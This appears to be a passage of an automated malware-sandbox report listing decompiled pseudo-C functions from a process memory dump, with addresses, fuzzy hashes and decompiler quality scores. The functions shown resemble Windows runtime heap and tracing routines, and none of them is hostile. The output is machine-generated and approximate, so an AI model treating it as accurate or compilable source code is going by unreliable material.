E0114FE87(intOrPtr __ecx) { signed int _v8; intOrPtr _v16; intOrPtr _v20; signed int _v24; intOrPtr _v28; short _v54; char _v60; signed char* _t21; intOrPtr _t27; intOrPtr _t32; intOrPtr _t33; intOrPtr _t34; signed int _t35; _v8 = *0x11ad360 ^ _t35; _v16 = __ecx; _v54 = 0x1722; _v24 = *(__ecx + 0x14) & 0x00ffffff; _v28 = *((intOrPtr*)(__ecx + 4)); _v20 = *((intOrPtr*)(__ecx + 0xc)); if(E010D7D50() == 0) { _t21 = 0x7ffe0382; } else { _t21 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228; } _push( &_v60); _push(0x10); _push(0x20402); _push( *_t21 & 0x000000ff); return E010FB640(E010F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34); } 0x0114fe96 0x0114fe9e 0x0114fea1 0x0114fead 0x0114feb3 0x0114feb9 0x0114fec3 0x0114fed5 0x0114fec5 0x0114fece 0x0114fece 0x0114fee0 0x0114fee1 0x0114fee3 0x0114fee8 0x0114fefb

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 7d87e973599ec974d5bb572f514ca5e2d3c905df74cf187d8124a245cda145c4 Instruction ID: 1d663b867ef8dbe2388e96f859f373904b941d7aff998471c9f260e4d55aa251 Opcode Fuzzy Hash: 7d87e973599ec974d5bb572f514ca5e2d3c905df74cf187d8124a245cda145c4 Instruction Fuzzy Hash: 87016270A00209EFCB14DFACD542AAEBBF4EF08704F504169B554EB382D635D902CB81

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 48%

E0117131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) { signed int _v8; intOrPtr _v12; intOrPtr _v16; intOrPtr _v20; intOrPtr _v24; short _v50; char _v56; signed char* _t18; intOrPtr _t24; intOrPtr _t30; intOrPtr _t31; signed int _t32; _t29 = __edx; _v8 = *0x11ad360 ^ _t32; _v20 = _a4; _v12 = _a8; _v24 = __ecx; _v16 = __edx; _v50 = 0x1021; if(E010D7D50() == 0) { _t18 = 0x7ffe0380; } else { _t18 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226; } _push( &_v56); _push(0x10); _push(0x20402); _push( *_t18 & 0x000000ff); return E010FB640(E010F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31); } 0x0117131b 0x0117132a 0x01171330 0x01171336 0x0117133e 0x01171341 0x01171344 0x0117134f 0x01171361 0x01171351 0x0117135a 0x0117135a 0x0117136c 0x0117136d 0x0117136f 0x01171374 0x01171387

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6a817f5f36234182370c6f2affeec42823c98e2d9683fd82b6a9f3ceb460c5b9 Instruction ID: 0989cf8c8ed571466c8932089cb0c303aae1f778c024d1f52b4330e199e98fed Opcode Fuzzy Hash: 6a817f5f36234182370c6f2affeec42823c98e2d9683fd82b6a9f3ceb460c5b9 Instruction Fuzzy Hash: 89014F71A0520DAFCB04EFA9D545AAEBBF4FF18700F404069F945EB781E634DA00CB94

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 48%

E01188F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) { signed int _v8; intOrPtr _v12; intOrPtr _v16; intOrPtr _v20; intOrPtr _v24; short _v50; char _v56; signed char* _t18; intOrPtr _t24; intOrPtr _t30; intOrPtr _t31; signed int _t32; _t29 = __edx; _v8 = *0x11ad360 ^ _t32; _v16 = __ecx; _v50 = 0x1c2c; _v24 = _a4; _v20 = _a8; _v12 = __edx; if(E010D7D50() == 0) { _t18 = 0x7ffe0386; } else { _t18 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } _push( &_v56); _push(0x10); _push(0x402); _push( *_t18 & 0x000000ff); return E010FB640(E010F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31); } 0x01188f6a 0x01188f79 0x01188f81 0x01188f84 0x01188f8b 0x01188f91 0x01188f94 0x01188f9e 0x01188fb0 0x01188fa0 0x01188fa9 0x01188fa9 0x01188fbb 0x01188fbc 0x01188fbe 0x01188fc3 0x01188fd6

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: b6573e2181e82e46005dd6831894b184aa4f086d719f6a27433e7e4ba87b3d0a Instruction ID: a69e142970b3403c012d4db0b1d239913e2e3208e940ef03e681648d8efc7acf Opcode Fuzzy Hash: b6573e2181e82e46005dd6831894b184aa4f086d719f6a27433e7e4ba87b3d0a Instruction Fuzzy Hash: 67014474A0020DAFDB04EFA8D545AAEB7F4EF18300F508059B945EB380DB34DA00CF95

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 46%

E01171608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) { signed int _v8; intOrPtr _v12; intOrPtr _v16; intOrPtr _v20; short _v46; char _v52; signed char* _t15; intOrPtr _t21; intOrPtr _t27; intOrPtr _t28; signed int _t29; _t26 = __edx; _v8 = *0x11ad360 ^ _t29; _v12 = _a4; _v20 = __ecx; _v16 = __edx; _v46 = 0x1024; if(E010D7D50() == 0) { _t15 = 0x7ffe0380; } else { _t15 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226; } _push( &_v52); _push(0xc); _push(0x20402); _push( *_t15 & 0x000000ff); return E010FB640(E010F9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28); } 0x01171608 0x01171617 0x0117161d 0x01171625 0x01171628 0x0117162b 0x01171636 0x01171648 0x01171638 0x01171641 0x01171641 0x01171653 0x01171654 0x01171656 0x0117165b 0x0117166e

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 2b457b3cfb227fb87c86552d1f297ed2d0affe5972fd7eed0d5312d9d73723c9 Instruction ID: fbb2f517c413feb49eaa248c03983160607d45b6f253f9e36b37a8a5a54897fb Opcode Fuzzy Hash: 2b457b3cfb227fb87c86552d1f297ed2d0affe5972fd7eed0d5312d9d73723c9 Instruction Fuzzy Hash: 1DF06271A04248EFDB14EFA9D406AAEBBF4EF18300F444069BA55EB381E674DA00CB94

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010DC577(void* __ecx, char _a4) { void* __esi; void* __ebp; void* _t17; void* _t19; void* _t20; void* _t21; _t18 = __ecx; _t21 = __ecx; if(__ecx == 0 || *((char*)(__ecx + 0xdd)) != 0 || E010DC5D5(__ecx, _t19) == 0 || *((intOrPtr*)(__ecx + 4)) != 0x10911cc || *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) { __eflags = _a4; if(__eflags != 0) { L10: E011888F5(_t17, _t18, _t19, _t20, _t21, __eflags); L9: return 0; } __eflags = *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)); if(__eflags == 0) { goto L10; } goto L9; } else { return 1; } } 0x010dc577 0x010dc57d 0x010dc581 0x010dc5b5 0x010dc5b9 0x010dc5ce 0x010dc5ce 0x010dc5ca 0x00000000 0x010dc5ca 0x010dc5c4 0x010dc5c8 0x00000000 0x00000000 0x00000000 0x010dc5ad 0x00000000 0x010dc5af

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 58407a09824562d18bce48bc40b1dbc448dbef56508518bf67eb31326dc9f96b Instruction ID: 981445853d576c58f84d15a742f046b39275e47bfa0e4e42235f00307f098d08 Opcode Fuzzy Hash: 58407a09824562d18bce48bc40b1dbc448dbef56508518bf67eb31326dc9f96b Instruction Fuzzy Hash: A7F0FAB29113909EF7B6832CC304B227FE99B15230FC484AED5C78320AC2A0CCC0C240

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 43%

E01188D34(intOrPtr __ecx, intOrPtr __edx) { signed int _v8; intOrPtr _v12; intOrPtr _v16; short _v42; char _v48; signed char* _t12; intOrPtr _t18; intOrPtr _t24; intOrPtr _t25; signed int _t26; _t23 = __edx; _v8 = *0x11ad360 ^ _t26; _v16 = __ecx; _v42 = 0x1c2b; _v12 = __edx; if(E010D7D50() == 0) { _t12 = 0x7ffe0386; } else { _t12 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } _push( &_v48); _push(8); _push(0x20402); _push( *_t12 & 0x000000ff); return E010FB640(E010F9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25); } 0x01188d34 0x01188d43 0x01188d4b 0x01188d4e 0x01188d52 0x01188d5c 0x01188d6e 0x01188d5e 0x01188d67 0x01188d67 0x01188d79 0x01188d7a 0x01188d7c 0x01188d81 0x01188d94

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: f03a51043f15ca0082633dfa47f0d9dd4eec0d298471cddbcf172c27ed12efc4 Instruction ID: 1f11f62917d4992e1097d4d70fc4940e43d50479398dab61051c2cacc348bb19 Opcode Fuzzy Hash: f03a51043f15ca0082633dfa47f0d9dd4eec0d298471cddbcf172c27ed12efc4 Instruction Fuzzy Hash: A4F0B470A046099FDB18FFB8D442BAE77B4EF18300F508099E905EB280DA34D900CB94

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%

E01172073(void* __ebx, void* __ecx, void* __edi, void* __eflags) { void* __esi; signed char _t3; signed char _t7; void* _t19; _t17 = __ecx; _t3 = E0116FD22(__ecx); _t19 = *0x11a849c - _t3; // 0x0 if(_t19 == 0) { __eflags = _t17 - *0x11a8748; // 0x0 if(__eflags <= 0) { E01171C06(); _t3 = *((intOrPtr*)( *[fs:0x30] + 2)); __eflags = _t3; if(_t3 != 0) { L5: __eflags = *0x11a8724 & 0x00000004; if(( *0x11a8724 & 0x00000004) == 0) { asm("int3"); return _t3; } } else { _t3 = *0x7ffe02d4 & 0x00000003; __eflags = _t3 - 3; if(_t3 == 3) { goto L5; } } } return _t3; } else { _t7 = *0x11a8724; // 0x0 return E01168DF1(__ebx, 0xc0000374, 0x11a5890, __edi, __ecx, !_t7 >> 0x00000002 & 0x00000001, !_t7 >> 0x00000002 & 0x00000001); } } 0x01172076 0x01172078 0x0117207d 0x01172083 0x011720a4 0x011720aa 0x011720ac 0x011720b7 0x011720ba 0x011720bc 0x011720c9 0x011720c9 0x011720d0 0x011720d2 0x00000000 0x011720d2 0x011720be 0x011720c3 0x011720c5 0x011720c7 0x00000000 0x00000000 0x011720c7 0x011720bc 0x011720d4 0x01172085 0x01172085 0x011720a3 0x011720a3

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 9c08e0ea59aa0cc7e532668b62d336ec8acc5efc4aa9fcee55bec7cd49f08ca9 Instruction ID: 281ca65f7a94d39df30790406e616d3031726d526b571237e82ad0eb53bc669b Opcode Fuzzy Hash: 9c08e0ea59aa0cc7e532668b62d336ec8acc5efc4aa9fcee55bec7cd49f08ca9 Instruction Fuzzy Hash: B9F0552A4256954ADF3F6B6C31003E93FB6E765114F890095D4B05730AC73589E3CB30

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 54%

E010F927A(void* __ecx) { signed int _t11; void* _t14; _t11 = L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98); if(_t11 != 0) { E010FFA60(_t11, 0, 0x98); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); *(_t11 + 0x1c) = *(_t11 + 0x1c) & 0x00000000; *((intOrPtr*)(_t11 + 0x24)) = 1; E010F92C6(_t11, _t14); } return _t11; } 0x010f9295 0x010f9299 0x010f929f 0x010f92aa 0x010f92ad 0x010f92ae 0x010f92af 0x010f92b0 0x010f92b4 0x010f92bb 0x010f92bb 0x010f92c5

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516 Instruction ID: 117ae490dcadaa3505000fcbe5955b464e9c7050113f6f08a4d54995f5d3a0bc Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516 Instruction Fuzzy Hash: 89E0ED322406016BE7619F0ACC81B8736A9AF92724F04407CBA005E282CAE6D80887A0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%

E010D746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) { signed int _t8; void* _t10; short* _t17; void* _t19; intOrPtr _t20; void* _t21; _t20 = __esi; _t19 = __edi; _t17 = __ebx; if( *((char*)(_t21 - 0x25)) != 0) { if(__ecx == 0) { E010CEB70(__ecx, 0x11a79a0); } else { asm("lock xadd [ecx], eax"); if((_t8 | 0xffffffff) == 0) { _push( *((intOrPtr*)(__ecx + 4))); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, *((intOrPtr*)(_t21 - 0x50))); _t17 = *((intOrPtr*)(_t21 - 0x2c)); _t20 = *((intOrPtr*)(_t21 - 0x3c)); } } L10: } _t10 = _t19 + _t19; if(_t20 >= _t10) { if(_t19 != 0) { *_t17 = 0; return 0; } } return _t10; goto L10; } 0x010d746d 0x010d746d 0x010d746d 0x010d7471 0x010d7488 0x0111f92d 0x010d748e 0x010d7491 0x010d7495 0x0111f937 0x0111f93a 0x0111f94e 0x0111f953 0x0111f956 0x0111f956 0x010d7495 0x00000000 0x010d7488 0x010d7473 0x010d7478 0x010d747d 0x010d7481 0x00000000 0x010d7481 0x010d747d 0x010d747a 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 5d7cc1a88e1ca77860ca0fd75f50f495c1a60377072bba0ec5909c1fc3a7ba38 Instruction ID: f647a5c1f93074b66a5ca9a08b4f9e4aefbc0b621b691aa553ff8268a4e17c1e Opcode Fuzzy Hash: 5d7cc1a88e1ca77860ca0fd75f50f495c1a60377072bba0ec5909c1fc3a7ba38 Instruction Fuzzy Hash: 01F0E934505345AADF4BA77CC440BBDBFB1AF04618F540159E5D1AB151FF259801CBD5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 36%

E01188CD6(intOrPtr __ecx) { signed int _v8; intOrPtr _v12; short _v38; char _v44; signed char* _t11; intOrPtr _t17; intOrPtr _t22; intOrPtr _t23; intOrPtr _t24; signed int _t25; _v8 = *0x11ad360 ^ _t25; _v12 = __ecx; _v38 = 0x1c2d; if(E010D7D50() == 0) { _t11 = 0x7ffe0386; } else { _t11 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } _push( &_v44); _push(0xffffffe4); _push(0x402); _push( *_t11 & 0x000000ff); return E010FB640(E010F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24); } 0x01188ce5 0x01188ced 0x01188cf0 0x01188cfb 0x01188d0d 0x01188cfd 0x01188d06 0x01188d06 0x01188d18 0x01188d19 0x01188d1b 0x01188d20 0x01188d33

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 1c52a5286224be70bc76f304bb5248934f8ce295eef9b1784780dc9285ec4798 Instruction ID: 1fb3f7ece1e8164de89789703d3d41535894551e7aa3bcdbcdf1311e2fa57507 Opcode Fuzzy Hash: 1c52a5286224be70bc76f304bb5248934f8ce295eef9b1784780dc9285ec4798 Instruction Fuzzy Hash: 8AF08270A04609ABDB08EFA9E946EAE77B4EF19204F504199F955EB281EA34D900CB54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010B4F2E(void* __ecx, char _a4) { void* __esi; void* __ebp; void* _t17; void* _t19; void* _t20; void* _t21; _t18 = __ecx; _t21 = __ecx; if(__ecx == 0) { L6: __eflags = _a4; if(__eflags != 0) { L8: E011888F5(_t17, _t18, _t19, _t20, _t21, __eflags); L9: return 0; } __eflags = *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)); if(__eflags != 0) { goto L9; } goto L8; } _t18 = __ecx + 0x30; if(E010DC5D5(__ecx + 0x30, _t19) == 0 || *((intOrPtr*)(__ecx + 0x34)) != 0x1091030 || *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) { goto L6; } else { return 1; } } 0x010b4f2e 0x010b4f34 0x010b4f38 0x01110b85 0x01110b85 0x01110b89 0x01110b9a 0x01110b9a 0x01110b9f 0x00000000 0x01110b9f 0x01110b94 0x01110b98 0x00000000 0x00000000 0x00000000 0x01110b98 0x010b4f3e 0x010b4f48 0x00000000 0x010b4f6e 0x00000000 0x010b4f70

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6013b5f22246eb93b990cb8c288f11811b41c5c85242ef2275ae7416453f6167 Instruction ID: 5bb0655377b85e6ce4f9538037c24b2fdb24d9959ccc1c45c9fb94b912e7fef7 Opcode Fuzzy Hash: 6013b5f22246eb93b990cb8c288f11811b41c5c85242ef2275ae7416453f6167 Instruction Fuzzy Hash: B6F0BE7A9216858FE766DB1CC184B22F7D4BB08678F444476E4468792AC764EDC0C648

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 36%

E01188B58(intOrPtr __ecx) { signed int _v8; intOrPtr _v20; short _v46; char _v52; signed char* _t11; intOrPtr _t17; intOrPtr _t22; intOrPtr _t23; intOrPtr _t24; signed int _t25; _v8 = *0x11ad360 ^ _t25; _v20 = __ecx; _v46 = 0x1c26; if(E010D7D50() == 0) { _t11 = 0x7ffe0386; } else { _t11 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; } _push( &_v52); _push(4); _push(0x402); _push( *_t11 & 0x000000ff); return E010FB640(E010F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24); } 0x01188b67 0x01188b6f 0x01188b72 0x01188b7d 0x01188b8f 0x01188b7f 0x01188b88 0x01188b88 0x01188b9a 0x01188b9b 0x01188b9d 0x01188ba2 0x01188bb5

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 330dae247d316f77e38e4f0d6024741392904a2846d8bcc07bd70ee43a5b518d Instruction ID: 6b195f5735be14242b5ba5e2d251956f1215445196e0d32ebe388a070788aad2 Opcode Fuzzy Hash: 330dae247d316f77e38e4f0d6024741392904a2846d8bcc07bd70ee43a5b518d Instruction Fuzzy Hash: A7F082B0A14259AFDB14FBA8D906EBE77B4EF44304F440459BA05DB380EB34D900CB94

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010EA44B(signed int __ecx) { intOrPtr _t13; signed int _t15; signed int* _t16; signed int* _t17; _t13 = *0x11a7b9c; // 0x0 _t15 = __ecx; _t16 = L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4); if(_t16 == 0) { return 0; } *_t16 = _t15; _t17 = &(_t16[2]); E010FFA60(_t17, 0, _t15 << 2); return _t17; } 0x010ea44b 0x010ea453 0x010ea472 0x010ea476 0x00000000 0x010ea493 0x010ea47a 0x010ea47f 0x010ea486 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 056ba05a71be4001a7c7ce54cb810d5a766245bc5675eab8ae256c3ee4272f29 Instruction ID: f868d16a484387b39f5c6fce61eccd98d23e67a03845065cc71ba564715db44e Opcode Fuzzy Hash: 056ba05a71be4001a7c7ce54cb810d5a766245bc5675eab8ae256c3ee4272f29 Instruction Fuzzy Hash: 47E092B3B01422ABD2225B19AC00FA7779DDBE8651F0A4039E645C7254DA68DD11C7E0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E010BF358(void* __ecx, signed int __edx) { char _v8; signed int _t9; void* _t20; _push(__ecx); _t9 = 2; _t20 = 0; if(E010EF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) { _t20 = L010D4620( &_v8, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8); } return _t20; } 0x010bf35d 0x010bf361 0x010bf367 0x010bf372 0x010bf38c 0x010bf38c 0x010bf394

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3 Instruction ID: 7b9e5aa0dd71b4881ed11490106dd38aa7bf717ee7b3d7e098e362e6bb6a614c Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3 Instruction Fuzzy Hash: 63E0DF32A41219FBDB21AAD99E05FEABFACDB58EA0F008195BA08D7150D5719E00C3D0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010CFF60(intOrPtr _a4) { void* __ecx; void* __ebp; void* _t13; intOrPtr _t14; void* _t15; void* _t16; void* _t17; _t14 = _a4; if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 || *((intOrPtr*)(_t14 + 4)) != 0x10911a4 || *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) { return E011888F5(_t13, _t14, _t15, _t16, _t17, __eflags); } else { return E010D0050(_t14); } } 0x010cff66 0x010cff6b 0x00000000 0x010cff8f 0x00000000 0x010cff8f

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 4534b63a5abd21eda98c6d9de94218d0608a036be47f821618dd891fc4170773 Instruction ID: e0e8845e4e7f0e48dfdffd6efc9d92e910f1729fcbd36f234b39b0a62c75c90b Opcode Fuzzy Hash: 4534b63a5abd21eda98c6d9de94218d0608a036be47f821618dd891fc4170773 Instruction Fuzzy Hash: 81E0DFB0205207AFDB3ADB59D050F2D3BDADF52A21F19809DF0884B102C661DA82CE8B

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E011441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) { void* _t5; void* _t14; _push(8); _push(0x11908f0); _t5 = E0110D08C(__ebx, __edi, __esi); if( *0x11a87ec == 0) { E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c))); *(_t14 - 4) = *(_t14 - 4) & 0x00000000; if( *0x11a87ec == 0) { *0x11a87f0 = 0x11a87ec; *0x11a87ec = 0x11a87ec; *0x11a87e8 = 0x11a87e4; *0x11a87e4 = 0x11a87e4; } *(_t14 - 4) = 0xfffffffe; _t5 = L01144248(); } return E0110D0D1(_t5); } 0x011441e8 0x011441ea 0x011441ef 0x011441fb 0x01144206 0x0114420b 0x01144216 0x0114421d 0x01144222 0x0114422c 0x01144231 0x01144231 0x01144236 0x0114423d 0x0114423d 0x01144247

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 88d10b3370d91d677a367d5865f40cd22940c83a4ad393227719a45bfc51f3ba Instruction ID: 33d5459bd4d2bf0895f4e0b835d4e5f6e60823e332402940e8e768e334f7db6f Opcode Fuzzy Hash: 88d10b3370d91d677a367d5865f40cd22940c83a4ad393227719a45bfc51f3ba Instruction Fuzzy Hash: 79F01EB8920B01CFCBB9EFE9E600B183EB4F754B26F80813A9124876C8C77449A0CF01

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0116D380(void* __ecx, void* __edx, intOrPtr _a4) { void* _t5; if(_a4 != 0) { _t5 = L010BE8B0(__ecx, _a4, 0xfff); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4); return _t5; } return 0xc000000d; } 0x0116d38a 0x0116d39b 0x0116d3b1 0x00000000 0x0116d3b6 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8 Instruction ID: e8ff122ecaec2a627f07028cfa0a3501701b69d8df5e33e0556ac71943719a0d Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8 Instruction Fuzzy Hash: A0E0C231384605BBDF265E84DC00FE9BB1AEF607A0F114031FE885A690C7729CA1D6C4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010EA185() { void* __ecx; intOrPtr* _t5; if( *0x11a67e4 >= 0xa) { if(_t5 < 0x11a6800 || _t5 >= 0x11a6900) { return L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5); } else { goto L1; } } else { L1: return E010D0010(0x11a67e0, _t5); } } 0x010ea190 0x010ea1a6 0x010ea1c2 0x00000000 0x00000000 0x00000000 0x010ea192 0x010ea192 0x010ea19f 0x010ea19f

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: f27ae7112b6067a133fe9a6158815d5539e0568f654f25e5087cfdc5714021e4 Instruction ID: d37abd5328afb2c953ef3129cf07f4fe401f2bd2e5d33f6daf8bfe6c0ca70616 Opcode Fuzzy Hash: f27ae7112b6067a133fe9a6158815d5539e0568f654f25e5087cfdc5714021e4 Instruction Fuzzy Hash: 04D02BB12311009EC62D13418E18BA53E52F7C8760F7E884CF2974B594EB50C8D0C109

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

